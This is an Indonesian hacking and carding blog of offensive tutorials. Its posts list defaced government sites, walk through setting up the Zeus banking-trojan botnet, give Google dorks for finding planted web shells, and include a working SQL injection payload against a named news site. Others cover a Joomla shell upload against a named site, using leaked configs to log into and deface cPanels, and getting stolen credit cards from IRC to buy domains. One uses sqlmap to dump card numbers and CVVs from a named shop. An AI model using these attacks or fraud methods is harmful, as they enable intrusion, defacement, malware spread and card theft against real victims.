PPC Iklan Blogger Indonesia
Tampilkan postingan dengan label Carding carder. Tampilkan semua postingan
Tampilkan postingan dengan label Carding carder. Tampilkan semua postingan

Selasa, 15 Oktober 2013

0 Xampp for Linux Write Access Vulnerability

03.13 Under From Unknown
[0 Comment]
ok mumpung masih hangat nih author blog Coretan_Raka , yg paling ganteng mau post nih, buat yang mau belajar sambil nyate kan masih idul qurban :) haha langsung aja ya.

Mantra Untuk Memperlancar exploit
Raka Paksi Ganteng

Dork :
allinurl:/xampp/index.php
allinurl:/xampp/ site:



Target : http://www.puertoesmeraldas.gob.ec/xampp/index.php
Okeh langsung cekidot
Hacked_Raka_Paksi nya ganti sama Hacked_By_Nickente masing-masing, klo gak di ganti ya baguslah :)
ok lanjut :)
Lho kok error ?
nah itu bukan error bro
Success !!
sekian dari saya Raka-Paksi, terima kasih telah membaca coretan ancur saya haha

Ini Hasil Saya :p

http://sda.pu.go.id:10001/xampp/lang.tmp
http://utara.jakarta.go.id/xampp/lang.tmp
http://www.visualartfoto.com/xampp/lang.tmp
http://aplikasi2.deptan.go.id/xampp/lang.tmp
http://perijinan.malangkota.go.id/xampp/lang.tmp
http://perpustakaan.big.go.id/xampp/lang.tmp
https://www.ead.ftc.br/xampp/lang.tmp
http://balitbangham.go.id/xampp-control.ini
http://sppd.mampu.gov.my/xampp/lang.tmp
Read More »

Jumat, 19 Juli 2013

0 Tutorial Setup Zeus Botnet Trojan

10.04 Under From Unknown
[0 Comment]
malam ini, saya akan share tentang Tutorial Setup Zeus Botnet Trojan.
Tutorial Setup Zeus Botnet ini adalah HANYA untuk tujuan pendidikan  dan saya TIDAK bertanggung jawab dengan cara apapun pada bagaimana kalian menyalahgunakan informasi yang saya diberikan.
Pertama-tama saya ingin memberitahu kalian bahwa Bot ZeuS adalah bot yang paling ilegal di luar sana. Ini adalah hanya bot yang terhubung ke webhost dan tidak ke saluran IRC atau PC. Hal ini sangat ilegal karena dianggap sebagai trojan perbankan seperti log setiap kegiatan internet ke database. Nah mari kita mulai.

Langkah 1
Pertama-tama kalian harus mempunyai software Zeus nya terlebih dahulu,
dan bisa kalian download di Zeus BotNet Trojan Download dan jika sudah di download kalian juga harus mempunyai sebuah akun hosting, Carilah penyedia hosting gratis akan tetapi yang berbasis Cpanel.
karena sejauh ini adalah Addon Hosting dengan cPanel lah yang terbaik.

Langkah 2: Upload file Zeus Botnet.

1. Login ke  CPanel X kalian.



2. Setelah masuk ke cPanel X pilih Filemanager
3. Buatlah 1 Directory disana
4. Uploadlah File Zeus Botnet yang berbentuk ZIP yang telah kalian download ke dalam Directory yang sudah di buat tadi.




5. Extrak file yang telah di Uploads


6. Chmod direktori / install / dan / system / ke 777. Juga seluruh direktori. 


Setelah semuanya teruploads sekarang kita menuju Langkah selanjut nya,

Langkah 3: Membuat Data Base Zeus Botnet.


1. Pergi ke MySQL Database yang ada di CPanel Kalian.
2. Buatlah database disana dan kita beri nama Test










3. Tambahkan User pada DataBase yang telah kita buat tadi,


























Setelah selesai membuat database Zeus Bot Net, tinggal kita instalasi Panel,


Langkah 4: Instalasi Panel Zeus Botnet.


1. Arahkan ke direktori yang Anda buat dan harus / direktori / install /. Sebuah installer Panel akan muncul. 
























Code:
Username: Enter the default username which you will use when logging in. 
Password: Your password when logging in. Make it strong. 
MySQL server: 
Host: "localhost" 
User: Your database user created before. 
Password: Your database password created for the user. 
Database: The database name.


Batas waktu bot Online: Biarkan saja seperti itu. Kunci enkripsi menggunakan sesuatu sangat kuat. Kemudian Klik Install




Langkah 5: Membuat bot. 

1. Arahkan ke file  ZeuS  dan config.txt terbuka Ganti link yang mengatakan dengan link Anda. Juga kunci enkripsi Anda gunakan sebelumnya. 




















2. Buka zsb.exe tersebut Builder juga memiliki remover jadi jika Anda menguji server Anda pada pc Anda sendiri, Anda hanya dapat menghapusnya dengan klik mouse. Klik Builder.
Kemudian klik pada Build Config. Simpan file. 
Klik Builder. Simpan file. 

















Sekarang uplodlah cfg.bin dan bt.exe ke direktori yang sama dengan panel. 
Anda juga dapat menghapus install / / folder karena panel telah diinstal pada langkah sebelumnya.


  









Pada akhir direktori dengan Zeus diinstal akan terlihat seperti ini: 














Sekarang arahkan ke direktori di mana kalian taruh panel ZeuS Botnet. 
public_html/direktori/cp.php 
dan Sebuah kotak login seperti ini harus ada:












Masukkan username dan password panel. jika Anda ingin untuk browser Anda untuk menjaga cookie sehingga Anda tidak perlu login lagi setiap kali Anda meninggalkan halaman centang pilihan. 
Klik Submit.
Setelah anda masuk ke panel maka akan muncul tampilan seperti ini, 


1. Menunjukkan Anda pengguna saat ini
2. Menunjukkan Anda ringkasan (lihat komentar hijau)
3. Menunjukkan Anda statistik OS dari bots terinfeksi.
4. Anda dapat menelusuri melalui bots dan dan laporan mereka
5. Anda dapat menelusuri melalui script yang Anda punya. Tambahkan / mengeditnya.
6. Sana Anda dapat mencari melalui laporan dalam database
7. Sana Anda dapat mencari melalui laporan yang paling kali adalah format txt.
8 Hanya informasi acak tentang sistem Anda dan barang-barang..
10. Pilihan. Jika Anda mengubah kunci enkripsi secara otomatis Anda kehilangan semua bot Anda. Anda perlu membuat server baru dan file konfigurasi dengan kunci enkripsi baru dan menyebarkannya lagi.
11. Ubah password Anda.
12 Menambah dan mengatur pengguna..
1. Menunjukkan Anda jumlah total laporan dalam database.

2. Menunjukkan Anda saat bot pertama kali datang online.

3. Menunjukkan Anda bots total. Jumlah keseluruhan pc yang terinfeksi.

4. Menunjukkan Anda jumlah ins bot aktif 24 jam terakhir.

5. Menunjukkan Anda versi minimal bots.

6. Menunjukkan Anda versi maksimal bots.

7. Menginstall. Setiap pc yang belum terinfeksi dengan server bot Zeus sebelum mendapat di daftar ini.

8. Dengan tombol Anda dapat menginstal ulang.

9. Menunjukkan Anda berapa banyak bot yang sedang online.

10. Memungkinkan Anda melompat ke statistik dari sebuah botnet
Read More »

Jumat, 31 Mei 2013

0 Cara Mencari Backdoor Dengan Google Dorks

00.27 Under From Unknown
[0 Comment]
[1]tempell dulu dork di google Ganteng
DORK

Quote:inurl:shell.php intext:rw-r--r--
inurl:/b374k.php
DORK LAINYA :
Spoiler: hide
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
inurl:c99.php
inurl:"/c99.php"
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
inurl:/c99.php+uname
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
"c99.php" filetype:php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
c99shell
intitle:C99Shell v. 1.0 pre-release +uname
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php uid=0(root)
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:C99Shell pre-release
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16!
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "


[2] oke Ganteng terus klik dah tuh salah satu hasil pencarian ....

[3]
-Coba satu2 Web ... kalau ngak bisa , berarti backdoornya udah dihapus , jadi coba web yang lain wakaka

-Kalau Sukses ni Contoh hasilnya....
Spoiler: hide
[Image: shelll.jpg] Cheer

NI.. om Contoh Hasil pepes : http://www.iek-se.eu/content/wp-content/uploads/

Semoga Berhasil Ganteng
Read More »

Minggu, 26 Mei 2013

1 Cara Mengetahui Username Dan password Web Melalui Exploit ( Berlaku pada semua Site )

08.16 Under From Unknown
[1 Comment]
ehm:/ oke selamata malam :)
bersama saya raka paksi
akan membagikan tutor Melakukan exploit kepada suatu site
contoh :   http://www.tvonenews.tv/polling_news/hasil.php?topik_id=

Nah maka ketika di id kita memasukan exploit nya berupa

218+UNION+%2F%2A%21SELECT%2A%2F+1%2C2%2Cunhex%28hex%28group_concat%28%2F%2A%21username%2C0x7c%2Cpassword%2A%2F%29%29%29%2C4+from+user--+


Selesai deh.. tinggal Hexa saja code nya lalu login deh :)
Read More »

Jumat, 24 Mei 2013

0 Kenali Tipe Hash Kamu !!!

00.10 Under From Unknown
[0 Comment]
1.MD5(Message-Digest algortihm 5)
=> MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (wikipedia)
- digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
- panjangnya 16 bytes (32 karakter)
- contoh : c4ca4238a0b923820dcc509a6f75849b

2.MD5($pass.$salt)
=> digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
- contoh : 6f04f0d75f6870858bae14ac0b6d9f73

3.MD5($salt.$pass)
=> digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
- panjang 16 bytes (32 karakter)
- hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
- contoh : f190ce9ac8445d249747cab7be43f7d

4.md5(md5($pass).$salt)
=> digunakan di vBulletin, IceBB dan cms lainnya
- panjang 16 bytes (32 karakter)
- contoh : 6011527690eddca23580955c216b1fd2

5.MD5(Wordpress)
=> digunakan di wordpress
- panjangnya 17 bytes (34 karakter)
- hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf "B") kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah "12345678") lalu dilanjutkan oleh hashnya
- contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

6.MD5(phpBB3)
=> digunakan di CMS phpBB 3.x.x
- panjangnya 17 bytes (34 karakter)
- hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor "9"), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") kemudian dilanjutkan oleh hashnya
- contoh : $H$9123456785DAERgALpsri.D9z3ht120

7.SHA-1(Secure Hash Algorithm)
=> diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard
digunakan oleh beberapa CMS dan beberapa forum
- panjangnya 20 bytes (40 karakter)
- contoh : 356a192b7913b04c54574d18c28d46e6395428ab

8.SHA-256(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") lalu dilanjutkan oleh karakter "$" kemudian dilanjutkan oleh hashnya
- panjang 55 karakter
- contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...

9.SHA-512(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") lalu dilanjutkan oleh karakter "$" kemudian dilanjutkan oleh hashnya
- panjang 98 karakter
- contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm...

10.Base64
=> algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan "="
- digunakan di beberapa forum dan CMS
- contoh : Y3liZXJfY3JpbWluYWw=

situs untuk mengcrack hash :
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
dan masih banyak lagi yang lain,,,
bagi yang mau nambahi silahkan di koment di sini,,, Bigsmile
Read More »

Rabu, 01 Mei 2013

0 Deface Dengan Joomla Component [Com_Fabrik] Remote Shell Upload Vulnerability

01.21 Under From Unknown
[0 Comment]
Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.
Oke, langsung saja.
Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik

Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1




Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV

Dan shell kita akan terletak di [site]/media/[shell.php]


Terus,  hajar !!!!
We Are Surabaya BlackHat !
Sekian tutorial kali ini, semoga bermanfaat.
Read More »

Minggu, 21 April 2013

5 Cara mendaftar/Registrasi di Underunix Chanel Carding

03.05 Under From Unknown
[5 Comment]

Cara mendapatkan CC untuk order Domain (TLD) + Pic

10:07 AM
Hey hey hey ketemu gw lagi..
Udah pada tau kan? apa itu intuit? wakaka korban order domain :p
Kali ini bukan make ByPass atau make CC dari Black4rt.
Kali ini CCnya nyari sendiri di IRC (lebih mantap),

Ok sip kita simak aja tutorial berikut :

- Anda harus mempunyai mIRC (Internet Relay Chat) // Download Disini
- Silahkan anda konek ke server irc.under-unix.com dengan cara :




/s irc.under-unix.com 

- Tunggu 300 Detik untuk melakukan Registrasi ID.
- Jika sudah 300 detik lakukan register ID dengan cara.







/msg NickServ register password e-mail

- Setelah anda Register anda akan mendapat  passcode
- Masukan passcode dengan cara :






/msg NickServ PROCEED passcode here
ex : /msg NickServ PROCEED 6dj388aj3

- Jika sudah, Join ke channel #unix



/j #unix  

- Tunggu sampai ada yang share CCnya.
- Catat CC-nya dan gunakan untuk order domain di Intuit
- Kalo udah register di Intuit, bisa login disini

NB : 
- CC disini tidak hanya untuk order domain di Intuit, bisa di gunakan untuk keperluan lainnya,, ada pertanyaan? bisa komentar.
- Untuk menghindari Suspends dari pihak intuit, saya harap 1 CC digunakan untuk order 1 domain.

karena ada yang berkoar-koar.

refrensi,cara mendapatkan CC di IRC : http://markas-ku.blogspot.com/2012/08/pengertian-mirc-sampai-cara-mendapatkan.html
dan penggunaan di INTUIT saya coba-coba sendiri, karena kemarin saya lihat ada orang menggunakan CC dari Black4rt untuk order domain di provider tersebut!! 
Jika ini trik lama gw juga minta maaf, gw ga tau kalo udah ada tutor kek gini sebelumnya !!

UPDATE :
server untuk IRC-nya sekarang pindah ke irc.under-unix.net
Read More »

Senin, 15 April 2013

1 Cara Mencari Cpanel Menggunakan Dork

06.14 Under From Unknown
[1 Comment]


            Cpanel merupakan control panel web yang berguna untuk menyimpan/menambah/mengedit semua direktori dari suatu web. Nah, kita bisa mencari sebuah cpanel dari suatu web menggunakan bantuan dari google, yaitu menggunakan dork.



1. Ketik dork berikut ke kotak pencari google : <?php JConfig public $$offset user = filetype:txt

2. Dari hasil penesuluran, buka salah satu. Nanti anda akan melihat penampakan seperti ini

3. Coba perhatikan text ini

public $user = 'xtellkz_ujoom';
public $password = 'gfhjkm333';
Itu adalah username dan password cpanel dari suatu web. Kita tinggal cari saja itu cpanel dari web mana




4. Coba perhatikan text yang ini
public $mailfrom = 'info@shtrih.kz';
Berarti, cpanel yang kita temukan adalah cpanel dari web shtrih.kz. Kita tinggal cari tempat login untuk masuk ke cpanelnya. Biasanya www.site.com:2082

5. Masuklah menggunakan username dan password yang tadi kalian temukan

6. Jika berhasil masuk, silahkan deh di eksekusi webnya. Kalau mau di deface, tinggal masuk ke file manager, lalu ke public_html, edit isi dari file bernama index.php / index.html, isi dengan script deface kalian. Buka deh webnya www.site.com

NB : Cara ini tentunya sudah digunakan oleh banyak orang. Jadi kebanyakan web sudah pernah di deface dan pastinya sudah di patch oleh admin webnya. Jadi tidak semua username dan password yang kalian temukan itu valid. Tergantung keburuntungan anda jika menemukan yang valid.

Selamat mencari ^_^

Read More »

Kamis, 04 April 2013

0 Tutorial Carding With dork & sqlimap

10.26 Under From Unknown
[0 Comment]
Bagi Bagi Tutorial Buat Caldel :3

Ok Langsung Aja Ke Tkp



1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :
Pertama ,ambil dork lalu scan menggunakan sqli scanner :
Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
Nah, web tersebut error saat kita inject ,





Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
Disini kita mendapatkan 3 database :





[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :






Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 



Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .

Jika kurang jelas bisa download video nya disini


Semoga bermanfaat :)


Read more: http://www.ra-one2hack.org/2013/03/tutorial-carding-with-carding-dork_3831.html
Read More »